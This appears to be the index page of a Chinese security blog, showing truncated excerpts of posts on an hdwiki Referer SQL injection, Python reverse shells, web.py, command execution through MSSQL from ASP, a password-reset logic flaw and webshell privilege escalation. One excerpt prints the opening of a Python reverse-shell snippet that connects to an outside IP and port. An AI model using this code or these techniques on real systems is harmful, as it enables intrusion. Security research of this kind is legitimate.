hdwiki某处对referer未做过滤，造成sql注入     但因为没有输出点，只能做盲注。     基于时间的盲注脚本已写好，测试可注入...

    python在linux下的反弹shell代码我相信很多人都见过： import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...

    最近在做python的web开发（原谅我的多变，好东西总想都学着。。。node.js也是），不过过程中总遇到些问题，不管是web.py还是django，开发起来确实没用php方便，毕竟存在的时间比...

    整理一下这些天研究web.py的一些经验，写一篇具有划时代意义的指南性说明~哈哈，开个玩笑，谨以此文献给所有学习web.py的同学以及Aaron Swart.     web.py是一个开...

    实话说我标题党了，这只是一个小tip，不能算漏洞（因为我想swart就是这样设计的）。不过文档中似乎没有把这个说出来，我想如果有一千万分之一的概率被程序员这样写了，...

    之前自己网上找各种方法拼拼凑凑出来的一个脚本，目的是在asp环境下连接mssql并执行命令。     因为不是webshell所以不用考虑过狗不过狗，过不过WAF，安全狗之类的W...

    某比赛实在有点坑人，题目涉嫌抄袭不说，还不停改来改去。算了不吐槽了，说一则javascript小特性吧。     toUpperCase()是javascript中将小写转换成大写的函数。toL...

遇到个有趣的逻辑漏洞，和大家分享一下。  某系统数据库是mysql。user表有个code字段，类型是int(11)，这个字段是保存一个随机数，用来找回密码的时候做验证，默认值是0。  找回密码时候的步...

    linux下，有时候拿到webshell需要提权，提权必须要得到一个交互式的shell。     我看了一下常用的php webshell，对于命令执行、反弹shell都没有完善的方式。很多web...

双十一啥都没买，一没妹纸二没钱，干脆坐电脑前面写代码吧。看到 @阿里云安全 发的微博： 我想，这个简单啊，作为一个忠实的py党，一分钟写了个简单的： 如此如此： 后来想想，我去，不行说...